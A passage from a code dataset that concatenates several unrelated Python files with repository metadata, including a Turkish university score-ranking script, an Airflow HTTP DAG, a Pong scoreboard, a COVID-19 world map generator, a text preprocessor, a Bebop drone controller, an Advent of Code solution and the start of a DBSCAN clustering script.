sys.exit(1)\n except MalformedFacultyStringException as e:\n print (e.str)\n sys.exit(1)\n except MalformedProgramStateStringException as e:\n print (e.str)\n sys.exit(1)\n\n fd.close()\n\n stat_list = []\n\n for u in range(len(university_list)):\n uni = university_list[u]\n for f in range(uni.get_num_of_faculties()):\n faculty = uni.get_faculty_by_index(f)\n for p in range(faculty.get_num_of_programs()):\n prog = faculty.get_program_by_index(p)\n\n prog_full_name = (\"%-105s %-15s %-4s %-10s %-12s\" %\n ((str(uni.get_university_name()) + \" - \" + str(faculty.get_faculty_name())),\n (prog.get_program_is_private() and (\"(%\" + ((\"%3s\") % str(prog.get_program_scholarship())) + \" Burslu)\") or \"\"),\n (prog.get_program_is_evening_edu() and \"(İÖ)\" or \"\"),\n (prog.get_program_is_tech_high_school_priv() and \"(M.T.O.K.)\" or \"\"),\n ((Language.ENGLISH == prog.get_program_language()) and \"(İngilizce)\" or\n ((Language.GERMAN == prog.get_program_language()) and \"(Almanca)\" or \"\"))))\n\n stat_list.append({'name' : prog_full_name,\n 'is_private' : prog.get_program_is_private(),\n 'lb_score' : prog.get_program_lower_bound_score(),\n 'ub_score' : prog.get_program_upper_bound_score(),\n 'scholarship' : prog.get_program_scholarship(),\n 'is_evening_edu' : prog.get_program_is_evening_edu(),\n 'language' : prog.get_program_language(),\n 'is_tech_high_school_priv': prog.get_program_is_tech_high_school_priv(),\n 'student_quota' : prog.get_program_student_quota(),\n 'num_of_student_got_in' : prog.get_program_num_of_student_got_in()})\n\n ###########################################################################\n stat_list.sort(key = lambda dict: dict['ub_score'], reverse = True)\n\n fd = open(\"Üniversitelerin Başarı Sırası (Tavan Puanına Göre).txt\", \"w\")\n fd.write(\"...::: Üniversitelerin Başarı Sırası (Tavan Puanına Göre) :::...\\n\")\n for i in range(len(stat_list)):\n fd.write(\"%-4d - %-150s : %f\\n\" % (i + 1, stat_list[i]['name'], stat_list[i]['ub_score']))\n fd.write(\"\\n\")\n fd.close()\n\n fd = open(\"Devlet Üniversiteleri Başarı Sırası (Tavan Puanına Göre).txt\", \"w\")\n fd.write(\"...::: Devlet Üniversiteleri Başarı Sırası (Tavan Puanına Göre) :::...\\n\")\n idx = 0\n for i in range(len(stat_list)):\n if ( False == stat_list[i]['is_private'] ):\n fd.write(\"%-4d - %-150s : %f\\n\" % (idx + 1, stat_list[i]['name'], stat_list[i]['ub_score']))\n idx += 1\n fd.write(\"\\n\")\n fd.close()\n\n fd = open(\"Özel Üniversiteler Başarı Sırası (Tavan Puanına Göre).txt\", \"w\")\n fd.write(\"...::: Özel Üniversiteler Başarı Sırası (Tavan Puanına Göre) :::...\\n\")\n idx = 0\n for i in range(len(stat_list)):\n if ( True == stat_list[i]['is_private'] ):\n fd.write(\"%-4d - %-150s : %f\\n\" % (idx + 1, stat_list[i]['name'], stat_list[i]['ub_score']))\n idx += 1\n fd.write(\"\\n\")\n fd.close()\n\n ###########################################################################\n stat_list.sort(key = lambda dict: dict['lb_score'], reverse = True)\n\n fd = open(\"Üniversitelerin Başarı Sırası (Taban Puanına Göre).txt\", \"w\")\n fd.write(\"...::: Üniversitelerin Başarı Sırası (Taban Puanına Göre) :::...\\n\")\n for i in range(len(stat_list)):\n fd.write(\"%-4d - %-150s : %f\\n\" % (i + 1, stat_list[i]['name'], stat_list[i]['lb_score']))\n fd.write(\"\\n\")\n fd.close()\n\n fd = open(\"Devlet Üniversiteleri Başarı Sırası (Taban Puanına Göre).txt\", \"w\")\n fd.write(\"...::: Devlet Üniversiteleri Başarı Sırası (Taban Puanına Göre) :::...\\n\")\n idx = 0\n for i in range(len(stat_list)):\n if ( 
False == stat_list[i]['is_private'] ):\n fd.write(\"%-4d - %-150s : %f\\n\" % (idx + 1, stat_list[i]['name'], stat_list[i]['lb_score']))\n idx += 1\n fd.write(\"\\n\")\n fd.close()\n\n fd = open(\"Özel Üniversiteler Başarı Sırası (Taban Puanına Göre).txt\", \"w\")\n fd.write(\"...::: Özel Üniversiteler Başarı Sırası (Taban Puanına Göre) :::...\\n\")\n idx = 0\n for i in range(len(stat_list)):\n if ( True == stat_list[i]['is_private'] ):\n fd.write(\"%-4d - %-150s : %f\\n\" % (idx + 1, stat_list[i]['name'], stat_list[i]['lb_score']))\n idx += 1\n fd.write(\"\\n\")\n fd.close()\n\n ###########################################################################\n\n fd = open(\"Toplam Kotenjan ve Toplam Yerleşen Öğrenci Sayısı.txt\", \"w\")\n fd.write(\"...::: Toplam Kotenjan ve Toplam Yerleşen Öğrenci Sayısı :::...\\n\")\n total_student_quota = 0\n total_num_of_student_got_in = 0\n for i in range(len(stat_list)):\n total_student_quota += stat_list[i]['student_quota']\n total_num_of_student_got_in += stat_list[i]['num_of_student_got_in']\n fd.write(\"Toplam Kontenjan : %d.\\n\" % (total_student_quota))\n fd.write(\"Toplam Yerleşen Öğrenci Sayısı : %d.\\n\" % (total_num_of_student_got_in))\n fd.write(\"Boşta Kalan Kontejan Sayısı : %d.\\n\" % (total_student_quota - total_num_of_student_got_in))\n fd.write(\"\\n\")\n fd.close()\n\n ###########################################################################\n\n fd = open(\"Devlet Üniversiteleri Toplam Kotenjan ve Toplam Yerleşen Öğrenci Sayısı.txt\", \"w\")\n fd.write(\"...::: Devlet Üniversiteleri Toplam Kotenjan ve Toplam Yerleşen Öğrenci Sayısı :::...\\n\")\n state_uni_total_student_quota = 0\n state_uni_total_num_of_student_got_in = 0\n for i in range(len(stat_list)):\n if ( False == stat_list[i]['is_private'] ):\n state_uni_total_student_quota += stat_list[i]['student_quota']\n state_uni_total_num_of_student_got_in += stat_list[i]['num_of_student_got_in']\n fd.write(\"Toplam Kontenjan : %d.\\n\" % (state_uni_total_student_quota))\n fd.write(\"Toplam Yerleşen Öğrenci Sayısı : %d.\\n\" % (state_uni_total_num_of_student_got_in))\n fd.write(\"Boşta Kalan Kontejan Sayısı : %d.\\n\" % (state_uni_total_student_quota -\n state_uni_total_num_of_student_got_in))\n fd.write(\"\\n\")\n fd.close()\n\n ###########################################################################\n\n fd = open(\"Özel Üniversitelerin Toplam Kotenjan ve Toplam Yerleşen Öğrenci Sayısı.txt\", \"w\")\n fd.write(\"...::: Özel Üniversitelerin Toplam Kotenjan ve Toplam Yerleşen Öğrenci Sayısı :::...\\n\")\n priv_uni_total_student_quota = 0\n priv_uni_total_num_of_student_got_in = 0\n for i in range(len(stat_list)):\n if ( True == stat_list[i]['is_private'] ):\n priv_uni_total_student_quota += stat_list[i]['student_quota']\n priv_uni_total_num_of_student_got_in += stat_list[i]['num_of_student_got_in']\n fd.write(\"Toplam Kontenjan : %d.\\n\" % (priv_uni_total_student_quota))\n fd.write(\"Toplam Yerleşen Öğrenci Sayısı : %d.\\n\" % (priv_uni_total_num_of_student_got_in))\n fd.write(\"Boşta Kalan Kontejan Sayısı : %d.\\n\" % (priv_uni_total_student_quota -\n priv_uni_total_num_of_student_got_in))\n fd.write(\"\\n\")\n fd.close()\n\n sys.exit(0)\n","repo_name":"mustafacamurlu/cse_department_stats","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"36918108427","text":"# Package Import\nfrom airflow import DAG\nfrom airflow.operators.bash import 
BashOperator\nfrom airflow.providers.http.operators.http import SimpleHttpOperator\nfrom airflow.decorators import task\nimport pendulum\n\nwith DAG(\n dag_id='dags_simple_http_operator',\n start_date=pendulum.datetime(2023, 4, 1, tz='Asia/Seoul'),\n catchup=False,\n schedule=None\n) as dag:\n\n '''서울시 공공자전거 대여소 정보'''\n tb_cycle_station_info = SimpleHttpOperator(\n task_id='tb_cycle_station_info',\n http_conn_id='openapi.seoul.go.kr',\n endpoint='{{var.value.apikey_openapi_seoul_go_kr}}/json/tbCycleStationInfo/1/10/',\n method='GET',\n headers={'Content-Type': 'application/json',\n 'charset': 'utf-8',\n 'Accept': '*/*'\n }\n )\n\n @task(task_id='python_2')\n def python_2(**kwargs):\n ti = kwargs['ti']\n rslt = ti.xcom_pull(task_ids='tb_cycle_station_info')\n import json\n from pprint import pprint\n\n pprint(json.loads(rslt))\n \n tb_cycle_station_info >> python_2()\n","repo_name":"hjkim-sun/airflow","sub_path":"dags/dags_simple_http_operator.py","file_name":"dags_simple_http_operator.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"86"} +{"seq_id":"71875396123","text":"from turtle import Turtle, Screen\r\n\r\n\r\nclass Score(Turtle):\r\n \"\"\"controlling all the functions of the score board\"\"\"\r\n def __init__(self):\r\n super().__init__()\r\n self.screen = Screen()\r\n self.screen.tracer(0)\r\n self.color(\"white\")\r\n self.penup()\r\n self.hideturtle()\r\n self.human_score = 0\r\n self.machine_score = 0\r\n self.goto(-100, 230)\r\n self.write(self.human_score, align=\"center\", font=(\"Courier\", 50, \"normal\"))\r\n self.goto(100, 230)\r\n self.write(self.machine_score, align=\"center\", font=(\"Courier\", 50, \"normal\"))\r\n self.screen.tracer(1)\r\n\r\n def increase_score(self, who):\r\n self.screen.tracer(0)\r\n self.clear()\r\n if who == \"left\":\r\n self.machine_score += 1\r\n elif who == \"right\":\r\n self.human_score += 1\r\n else:\r\n pass\r\n self.goto(-100, 230)\r\n self.write(self.human_score, align=\"center\", font=(\"Courier\", 50, \"normal\"))\r\n self.goto(100, 230)\r\n self.write(self.machine_score, align=\"center\", font=(\"Courier\", 50, \"normal\"))\r\n self.screen.tracer(1)\r\n","repo_name":"BimsaraS99/PingPong-Game-For-Kids---Python-","sub_path":"score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"37318918314","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Alex Li\nage = 22\nfor i in range(10):\n #i = 0\n print('new i2',i)\n if i <3:\n guess_num = int( input(\"input your guess num:\") )\n if guess_num == age :\n print(\"Congratulations! 
you got it.\")\n break #不往后走了,跳出整 个loop\n elif guess_num >age:\n print(\"Think smaller!\")\n else:\n print(\"Think Big...\")\n else:\n #print(\"too many attempts...bye\")\n #break\n continue_confirm = input(\"Do you want to continue because you are stupid:\")\n if continue_confirm == 'y':\n #pass #\n i = 0\n print('new i',i)\n else:\n print(\"bye\")\n break\n","repo_name":"SesameMing/Python51CTONetwork","sub_path":"TerchaerCode/s13day1课上代码/s13day1_code/guess age 优化v3.py","file_name":"guess age 优化v3.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71947506204","text":"from typing import Callable, Mapping, Sequence, Any\nfrom randfig.transforms.config_transform import ConfigTransform\n\n\n__all__ = [\"Formula\"]\n\n\nclass Formula(ConfigTransform):\n \"\"\"\n Compute a configuration value from a ``Callable[[Mapping], Any]``.\n For example:\n\n .. exec_code::\n\n # --- hide: start ---\n from randfig import Formula\n # --- hide: stop ---\n\n init_config = {\"param_0\": 1}\n form = Formula(keys=[\"param_1\"], formula = lambda cfg: 2 * cfg[\"param_0\"])\n out = form(init_config)\n\n # --- hide: start ---\n print(f\"out: {out}\")\n # --- hide: stop ---\n \"\"\"\n\n def __init__(self, keys: Sequence[str], formula: Callable[[Mapping], Any]) -> None:\n \"\"\"\n Args:\n formula: a callable for computing ``keys``, the signature must be the\n one specified in the type hints, that is ``typing.Callable[[Mapping], Any]``.\n In order to follow that signature, ``functools.partial`` might help\n in most cases.\n \"\"\"\n super().__init__(keys)\n self.formula = formula\n\n def __call__(self, cfg: Mapping) -> Mapping:\n \"\"\"\n Compute the new keys specified by ``keys``\n following the operation defined by ``formula``.\n \"\"\"\n self._check_mapping(cfg)\n for key in self.keys:\n cfg[key] = self.formula(cfg)\n return cfg\n","repo_name":"YerePhy/randfig","sub_path":"randfig/transforms/formula.py","file_name":"formula.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"24950871337","text":"import re\r\n\r\nprint(\"Redcouz Calculator\")\r\n\r\nprevious = 0\r\nrun = True\r\n\r\ndef performMath():\r\n global run\r\n global previous\r\n equation = ''\r\n if previous == 0: #<<< Make sure thats starts at the first equation >>>\r\n \r\n equation = input('Enter Equation (Type \"Quit\" if you want to finish):')\r\n \r\n else: #<<< Sum to the previous result >>>\r\n \r\n equation = input(str(previous))\r\n \r\n if equation == \"Quit\": #<<< Ends the script >>>\r\n \r\n run = False\r\n print(\"Thanks for using may calculator, See you soon\")\r\n \r\n else: \r\n \r\n equation = re.sub('[a-zA-Z,.:()\" \"]', '', equation) #<<< Delete everything that is not a number >>>\r\n if previous == 0:\r\n \r\n previous = eval(equation)\r\n\r\n else:\r\n \r\n previous = eval(str(previous) + equation)\r\n\r\n print(\"Its equal to\", previous) #<<< Outcome >>>\r\n\r\nwhile run:\r\n performMath()\r\n\r\n\r\n","repo_name":"Redcouz/python_ex_Number1","sub_path":"ex1_calculator.py","file_name":"ex1_calculator.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"41102739560","text":"#!/usr/bin/env python\n# _*_coding:utf-8 _*_\n\"\"\"\n@Time : 21:53\n@Auther : Jarrett\n@FileName: run\n@Software: PyCharm\n\"\"\"\n\n# 各种API接口\n# 
https://lab.isaaclin.cn/nCoV/api/area?latest=0\n#https://github.com/CSSEGISandData/COVID-19/blob/master/csse_covid_19_data/csse_covid_19_daily_reports/05-30-2020.csv\n# https://www.arcgis.com/apps/opsdashboard/index.html#/bda7594740fd40299423467b48e9ecf6\n# https://coronavirus.jhu.edu/map.html\n# https://experience.arcgis.com/experience/685d0ace521648f8a5beeeee1b9125cd\n# https://lab.isaaclin.cn/nCoV/\n# 有效https://lab.isaaclin.cn/nCoV/api/provinceName?lang=zh\n\n\nimport numpy as np\nimport pandas as pd\nimport json\nimport requests\nimport jsonpath\nfrom pyecharts.charts import Map\nfrom pyecharts import options as opts\n\ndef GetChinaData():\n \"\"\"\n 获取中国的数据\n :return:\n \"\"\"\n url = 'https://api.inews.qq.com/newsqa/v1/automation/foreign/country/ranklist' # 需要更换api\n response = requests.post(url).text\n resp = json.loads(response) # 使用变量resp来接收字典格式的数据\n for data in resp['data']: # 遍历提取每个国家的疫情数据\n name = data['name'] # 国家名\n confirm = data['confirm'] # 该国家疫情人数\n dead = data['dead']\n heal = data['heal']\n nowConfirm = data['nowConfirm']\n confirmCompare = data['confirmCompare']\n nowConfirmCompare = data['nowConfirmCompare']\n healCompare = data['healCompare']\n deadCompare = data['deadCompare']\n # print(name, confirm, dead,heal, nowConfirm, confirmCompare, nowConfirmCompare, healCompare, deadCompare)\n return data\n\ndef GetWorldData():\n \"\"\"\n 绘制世界地图!\n :return:\n \"\"\"\n # 1.目标网站\n url = 'https://api.inews.qq.com/newsqa/v1/automation/foreign/country/ranklist'\n # 2.请求资源\n resp = requests.get(url)\n # 3.提取数据\n # 类型转换 json-->dict\n data = json.loads(resp.text)\n print(data)\n name = jsonpath.jsonpath(data, \"$..name\") # 国家名\n confirm = jsonpath.jsonpath(data, \"$..confirm\") # 确诊人数\n dead = jsonpath.jsonpath(data, \"$..dead\") # 死亡人数\n nowConfirm = jsonpath.jsonpath(data, \"$..nowConfirm\") # 现存确诊人数\n confirmCompare = jsonpath.jsonpath(data, \"$..confirmCompare\") # 新增确诊\n healCompare = jsonpath.jsonpath(data, \"$..healCompare\") # 新增治愈\n deadCompare = jsonpath.jsonpath(data, \"$..deadCompare\") # 新增死亡\n\n # 以下内容参考 http://gallery.pyecharts.org/#/Map/README\n c = (\n Map()\n .add(\"确诊人数\", [list(z) for z in zip(name, confirm)], \"world\", name_map = nameMap,\n is_map_symbol_show = False)\n .add(\"死亡人数\", [list(z) for z in zip(name, dead)], \"world\", name_map=nameMap,\n is_map_symbol_show=False)\n .add(\"现存确诊\", [list(z) for z in zip(name, nowConfirm)], \"world\", name_map=nameMap,\n is_map_symbol_show=False)\n .add(\"新增确诊\", [list(z) for z in zip(name, confirmCompare)], \"world\", name_map=nameMap,\n is_map_symbol_show=False)\n .add(\"新增治愈\", [list(z) for z in zip(name, healCompare)], \"world\", name_map=nameMap,\n is_map_symbol_show=False)\n .add(\"新增死亡\", [list(z) for z in zip(name, deadCompare)], \"world\", name_map=nameMap,\n is_map_symbol_show=False)\n .set_series_opts(label_opts=opts.LabelOpts(is_show=False))\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"2019-nCoV 世界地图\"),\n visualmap_opts=opts.VisualMapOpts(is_piecewise=True,\n pieces=[\n {\"min\":50000,\"label\":'>50000',\"color\":\"#893448\"},\n {\"min\":10000,\"max\":49999,\"label\":'10000-49999',\"color\":\"#ff585e\"},\n {\"min\":5000,\"max\":9999,\"label\":'5000-9999',\"color\":\"#FB8146\"},\n {\"min\":1000,\"max\":4999,\"label\":'1000-4999',\"color\":\"#ffa500\"},\n {\"min\":100,\"max\":999,\"label\":'100-999',\"color\":\"#ffb248\"},\n {\"min\":0,\"max\":99,\"label\":'0-99',\"color\":\"#fff2d1\"},\n ]),\n )\n .render(\"map_world.html\")\n )\n print('successful')\n return True\n\n# 世界各个国家的名称映射表\nnameMap = 
{\n 'Singapore Rep.':'新加坡',\n 'Dominican Rep.':'多米尼加',\n 'Palestine':'巴勒斯坦',\n 'Bahamas':'巴哈马',\n 'Timor-Leste':'东帝汶',\n 'Afghanistan':'阿富汗',\n 'Guinea-Bissau':'几内亚比绍',\n \"Côte d'Ivoire\":'科特迪瓦',\n 'Siachen Glacier':'锡亚琴冰川',\n \"Br. Indian Ocean Ter.\":'英属印度洋领土',\n 'Angola':'安哥拉',\n 'Albania':'阿尔巴尼亚',\n 'United Arab Emirates':'阿联酋',\n 'Argentina':'阿根廷',\n 'Armenia':'亚美尼亚',\n 'French Southern and Antarctic Lands':'法属南半球和南极领地',\n 'Australia':'澳大利亚',\n 'Austria':'奥地利',\n 'Azerbaijan':'阿塞拜疆',\n 'Burundi':'布隆迪',\n 'Belgium':'比利时',\n 'Benin':'贝宁',\n 'Burkina Faso':'布基纳法索',\n 'Bangladesh':'孟加拉国',\n 'Bulgaria':'保加利亚',\n 'The Bahamas':'巴哈马',\n 'Bosnia and Herz.':'波斯尼亚和黑塞哥维那',\n 'Belarus':'白俄罗斯',\n 'Belize':'伯利兹',\n 'Bermuda':'百慕大',\n 'Bolivia':'玻利维亚',\n 'Brazil':'巴西',\n 'Brunei':'文莱',\n 'Bhutan':'不丹',\n 'Botswana':'博茨瓦纳',\n 'Central African Rep.':'中非',\n 'Canada':'加拿大',\n 'Switzerland':'瑞士',\n 'Chile':'智利',\n 'China':'中国',\n 'Ivory Coast':'象牙海岸',\n 'Cameroon':'喀麦隆',\n 'Dem. Rep. Congo':'刚果民主共和国',\n 'Congo':'刚果',\n 'Colombia':'哥伦比亚',\n 'Costa Rica':'哥斯达黎加',\n 'Cuba':'古巴',\n 'N. Cyprus':'北塞浦路斯',\n 'Cyprus':'塞浦路斯',\n 'Czech Rep.':'捷克',\n 'Germany':'德国',\n 'Djibouti':'吉布提',\n 'Denmark':'丹麦',\n 'Algeria':'阿尔及利亚',\n 'Ecuador':'厄瓜多尔',\n 'Egypt':'埃及',\n 'Eritrea':'厄立特里亚',\n 'Spain':'西班牙',\n 'Estonia':'爱沙尼亚',\n 'Ethiopia':'埃塞俄比亚',\n 'Finland':'芬兰',\n 'Fiji':'斐',\n 'Falkland Islands':'福克兰群岛',\n 'France':'法国',\n 'Gabon':'加蓬',\n 'United Kingdom':'英国',\n 'Georgia':'格鲁吉亚',\n 'Ghana':'加纳',\n 'Guinea':'几内亚',\n 'Gambia':'冈比亚',\n 'Guinea Bissau':'几内亚比绍',\n 'Eq. Guinea':'赤道几内亚',\n 'Greece':'希腊',\n 'Greenland':'格陵兰',\n 'Guatemala':'危地马拉',\n 'French Guiana':'法属圭亚那',\n 'Guyana':'圭亚那',\n 'Honduras':'洪都拉斯',\n 'Croatia':'克罗地亚',\n 'Haiti':'海地',\n 'Hungary':'匈牙利',\n 'Indonesia':'印度尼西亚',\n 'India':'印度',\n 'Ireland':'爱尔兰',\n 'Iran':'伊朗',\n 'Iraq':'伊拉克',\n 'Iceland':'冰岛',\n 'Israel':'以色列',\n 'Italy':'意大利',\n 'Jamaica':'牙买加',\n 'Jordan':'约旦',\n 'Japan':'日本',\n 'Japan':'日本本土',\n 'Kazakhstan':'哈萨克斯坦',\n 'Kenya':'肯尼亚',\n 'Kyrgyzstan':'吉尔吉斯斯坦',\n 'Cambodia':'柬埔寨',\n 'Korea':'韩国',\n 'Kosovo':'科索沃',\n 'Kuwait':'科威特',\n 'Lao PDR':'老挝',\n 'Lebanon':'黎巴嫩',\n 'Liberia':'利比里亚',\n 'Libya':'利比亚',\n 'Sri Lanka':'斯里兰卡',\n 'Lesotho':'莱索托',\n 'Lithuania':'立陶宛',\n 'Luxembourg':'卢森堡',\n 'Latvia':'拉脱维亚',\n 'Morocco':'摩洛哥',\n 'Moldova':'摩尔多瓦',\n 'Madagascar':'马达加斯加',\n 'Mexico':'墨西哥',\n 'Macedonia':'马其顿',\n 'Mali':'马里',\n 'Myanmar':'缅甸',\n 'Montenegro':'黑山',\n 'Mongolia':'蒙古',\n 'Mozambique':'莫桑比克',\n 'Mauritania':'毛里塔尼亚',\n 'Malawi':'马拉维',\n 'Malaysia':'马来西亚',\n 'Namibia':'纳米比亚',\n 'New Caledonia':'新喀里多尼亚',\n 'Niger':'尼日尔',\n 'Nigeria':'尼日利亚',\n 'Nicaragua':'尼加拉瓜',\n 'Netherlands':'荷兰',\n 'Norway':'挪威',\n 'Nepal':'尼泊尔',\n 'New Zealand':'新西兰',\n 'Oman':'阿曼',\n 'Pakistan':'巴基斯坦',\n 'Panama':'巴拿马',\n 'Peru':'秘鲁',\n 'Philippines':'菲律宾',\n 'Papua New Guinea':'巴布亚新几内亚',\n 'Poland':'波兰',\n 'Puerto Rico':'波多黎各',\n 'Dem. Rep. Korea':'朝鲜',\n 'Portugal':'葡萄牙',\n 'Paraguay':'巴拉圭',\n 'Qatar':'卡塔尔',\n 'Romania':'罗马尼亚',\n 'Russia':'俄罗斯',\n 'Rwanda':'卢旺达',\n 'W. Sahara':'西撒哈拉',\n 'Saudi Arabia':'沙特阿拉伯',\n 'Sudan':'苏丹',\n 'S. 
Sudan':'南苏丹',\n 'Senegal':'塞内加尔',\n 'Solomon Is.':'所罗门群岛',\n 'Sierra Leone':'塞拉利昂',\n 'El Salvador':'萨尔瓦多',\n 'Somaliland':'索马里兰',\n 'Somalia':'索马里',\n 'Serbia':'塞尔维亚',\n 'Suriname':'苏里南',\n 'Slovakia':'斯洛伐克',\n 'Slovenia':'斯洛文尼亚',\n 'Sweden':'瑞典',\n 'Swaziland':'斯威士兰',\n 'Syria':'叙利亚',\n 'Chad':'乍得',\n 'Togo':'多哥',\n 'Thailand':'泰国',\n 'Tajikistan':'塔吉克斯坦',\n 'Turkmenistan':'土库曼斯坦',\n 'East Timor':'东帝汶',\n 'Trinidad and Tobago':'特里尼达和多巴哥',\n 'Tunisia':'突尼斯',\n 'Turkey':'土耳其',\n 'Tanzania':'坦桑尼亚',\n 'Uganda':'乌干达',\n 'Ukraine':'乌克兰',\n 'Uruguay':'乌拉圭',\n 'United States':'美国',\n 'Uzbekistan':'乌兹别克斯坦',\n 'Venezuela':'委内瑞拉',\n 'Vietnam':'越南',\n 'Vanuatu':'瓦努阿图',\n 'West Bank':'西岸',\n 'Yemen':'也门',\n 'South Africa':'南非',\n 'Zambia':'赞比亚',\n 'Zimbabwe':'津巴布韦'\n }\n\n\nif __name__ == '__main__':\n GetWorldData()\n\n","repo_name":"Jarrettluo/Word-Covid19-Map","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":10725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31481435448","text":"import string\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.feature_extraction.text import ENGLISH_STOP_WORDS\nimport os\n\n# 构建标点符号集\nall_punc = string.punctuation\n\nifile_path = 'C:\\\\Users\\\\McFly\\\\source\\\\VSCode\\\\搜索引擎\\\\Org_EN\\\\'\nofile_path = 'C:\\\\Users\\\\McFly\\\\source\\\\VSCode\\\\搜索引擎\\\\New_EN\\\\'\n\nfiles = os.listdir(ifile_path)\nfor file_name in files:\n txt = []\n with open(ifile_path + file_name, 'r', encoding='UTF-8') as f:\n lines = f.readlines()\n for line in lines:\n # sentence = ''\n for c in all_punc:\n line = line.replace(c, '') # 删除所有标点符号\n\n line = line.lower() # 转换成小写字母\n\n # 去除停用词\n word_list = [\n word for word in line.split() if word not in ENGLISH_STOP_WORDS\n ]\n\n porter_stemmer = PorterStemmer()\n singles = [porter_stemmer.stem(word) for word in word_list]\n sentence = ' '.join(singles)\n\n txt.append(sentence)\n f.close()\n\n ofile_name = ofile_path + 'New_' + file_name\n with open(ofile_name, \"w\") as file: # 写入文件路径 + 章节名称 + 后缀\n for line in txt:\n file.write(line)\n","repo_name":"mcflyhu/SearchEngine-CurriculumProject","sub_path":"文本预处理/pretreat_EN.py","file_name":"pretreat_EN.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17685695130","text":"from pyparrot.Bebop import Bebop\nimport numpy\n\nif __name__ == \"__main__\":\n print(r\"\"\"\n Y\n ^\n |\n |\n |\n |\n |\n ------------x-------------------> X\n | (0,0) Initial Copter location\n |\n |\n |\n |\n \"\"\")\n previousPosition = (0, 0, 1, 0)\n bebop = Bebop(ip_address=\"10.202.0.1\")\n success = bebop.connect(2)\n bebop.safe_takeoff(10)\n yesStrings = {'yes', 'y', 'ye'}\n while True:\n try:\n\n exit = input(\"\\n\\n\\n\\tExit the program and land the copter (y/n)?\")\n if exit in yesStrings:\n break\n\n x = float(input(\"\\n\\n\\n\\tPlease input your desired coordinates:\\n\\tX: \"))\n y = float(input(\"\\n\\tY: \"))\n z = float(input(\"\\n\\tZ: \"))\n rotation = float(input(\"\\n\\tCopter Rotation (Radians): \"))\n delta = numpy.subtract((x, y, z, rotation), previousPosition)\n previousPosition = (x, y, z, rotation)\n\n print(delta)\n bebop.move_relative(0, 0, -delta[2], 0)\n bebop.move_relative(0, delta[0], 0, 0)\n bebop.move_relative(delta[1], 0, 0, 0)\n bebop.move_relative(0, 0, 0, delta[3])\n\n except:\n \n bebop.emergency_land()\n bebop.disconnect()\n print(\"\\tError found. 
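# The preprocessing loop in pretreat_EN.py above applies four steps per line:
# strip punctuation, lowercase, drop sklearn's English stop words, then
# Porter-stem the remainder. The same pipeline as one reusable function
# (requires nltk and scikit-learn; the sample sentence is made up):
import string
from nltk.stem.porter import PorterStemmer
from sklearn.feature_extraction.text import ENGLISH_STOP_WORDS

def preprocess(line):
    for c in string.punctuation:
        line = line.replace(c, '')          # delete all punctuation
    line = line.lower()                     # normalize case
    words = [w for w in line.split() if w not in ENGLISH_STOP_WORDS]
    stemmer = PorterStemmer()
    return ' '.join(stemmer.stem(w) for w in words)

print(preprocess('The searching engines were indexing documents quickly!'))
# roughly: "search engin index document quickli"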
Closing application\")\n import sys\n sys.exit(0)\n\n bebop.safe_land(10)\n bebop.disconnect()\n","repo_name":"kholysa/CopterTests","sub_path":"SimpleCopterMove/SimpleCopterMove.py","file_name":"SimpleCopterMove.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"9842857557","text":"dictionary = {}\n\nwith open('day_7.txt') as f:\n for line in f:\n key = ' '.join(line.split()[0:2])\n value_str = ' '.join(line.split()[4:]).replace(' bags', '').replace(' bag', '').rstrip('.')\n value = []\n for bag in value_str.split(', '):\n if bag == 'no other':\n pass\n else:\n bag = bag.split()\n bag = bag[0], ' '.join(bag[1:])\n value.append(bag)\n dictionary.setdefault(key, value)\n\n\ndef shiny_bags(dictionary):\n '''How many colors can, eventually, contain at least one shiny gold bag?'''\n keys = ['shiny gold']\n new = []\n all_colors = []\n while keys: # until there is another key, which eventually contain shiny gold bag\n for key, value in dictionary.items():\n for tuple in value:\n if tuple[1] in keys: # contains bag, which contains shiny gold bag\n new.append(key)\n all_colors.append(key)\n keys = new\n new = []\n return len(set(all_colors)) # filter off duplicates\n\n\ndef shiny_bag_require(dictionary):\n ''' How many individual bags are required inside single shiny gold bag? '''\n count = -1\n tuple_number_color = [('1', 'shiny gold')]\n while tuple_number_color:\n one_cycle = []\n for number, color in tuple_number_color:\n for i in range(int(number)):\n count += 1\n one_cycle += dictionary[color]\n tuple_number_color = one_cycle\n return count\n\n\nprint(shiny_bags(dictionary)) # part 1\nprint(shiny_bag_require(dictionary)) # part 2","repo_name":"NelliaS/advent_of_code","sub_path":"advent_of_code_2020/day_7.py","file_name":"day_7.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"10373174972","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 2 08:50:56 2018\n\n@author: WT\n\"\"\"\nfrom src.cluster_plots import *\nfrom sklearn.cluster import DBSCAN\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.neighbors import NearestNeighbors\n\ndff = pd.read_csv(\"inter.csv\") \nX = clean_engineered_df(dff)\n\n#X = do_PCA(X,pca_n=3)\n\nnb = NearestNeighbors(n_neighbors=3, 